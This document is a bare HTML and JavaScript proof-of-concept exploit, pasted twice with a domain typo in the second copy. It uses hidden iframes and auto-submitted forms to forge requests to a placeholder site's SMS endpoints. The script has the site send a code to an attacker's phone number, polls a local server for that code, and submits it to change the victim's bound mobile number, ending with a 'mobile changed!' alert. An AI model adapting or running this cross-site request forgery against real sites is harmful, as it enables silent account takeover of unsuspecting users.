<div id='poc' width=0 height=0></div>
<script>
function get(url){
httpRequest = new XMLHttpRequest();
httpRequest.open('GET', url, false);
httpRequest.send();
if (httpRequest.status === 200) {
return httpRequest.responseText;
}
}
function post(url, key, value){
data='<body><form id="f1" action="'+url+'" method="POST"> \
<input name="'+key+'" type="text" value="'+value+'" /> \
</form> \
<script> \
f1.submit(function(){return false}) \
<\/script></body>'
f=document.createElement('iframe')
f.src="data:text/html;base64,"+btoa(data)
f.height=0
f.width=0
poc.append(f)
}
function getcode(){
url = 'http://127.0.0.1/1.php'
data = get(url)
if(data.length > 0){
clearInterval(sh)
exploit(data)
}
}
function exploit(code){
url = "https://www.xxx.com/user/verify_mobile_sms"
setTimeout(post, 0, url, "smscode1", code)
url = "https://www.xxx.com/user/verify_new_mobile_sms"
setTimeout(post, 3000, url, "smscode2", code)
setTimeout(alert, 4000, 'mobile changed!')
}
post("https://www.xxx.com/user/send_new_mobile_sms", 'mobile', '18888888888')
code = ''
sh=setInterval(getcode,1000);
</script>
<div id='poc' width=0 height=0></div>
<script>
function get(url){
httpRequest = new XMLHttpRequest();
httpRequest.open('GET', url, false);
httpRequest.send();
if (httpRequest.status === 200) {
return httpRequest.responseText;
}
}
function post(url, key, value){
data='<body><form id="f1" action="'+url+'" method="POST"> \
<input name="'+key+'" type="text" value="'+value+'" /> \
</form> \
<script> \
f1.submit(function(){return false}) \
<\/script></body>'
f=document.createElement('iframe')
f.src="data:text/html;base64,"+btoa(data)
f.height=0
f.width=0
poc.append(f)
}
function getcode(){
url = 'http://127.0.0.1/1.php'
data = get(url)
if(data.length > 0){
clearInterval(sh)
exploit(data)
}
}
function exploit(code){
url = "https://www.jxxx.com/user/verify_mobile_sms"
setTimeout(post, 0, url, "smscode1", code)
url = "https://www.xxx.com/user/verify_new_mobile_sms"
setTimeout(post, 3000, url, "smscode2", code)
setTimeout(alert, 4000, 'mobile changed!')
}
post("https://www.xxx.com/user/send_new_mobile_sms", 'mobile', '18888888888')
code = ''
sh=setInterval(getcode,1000);
</script>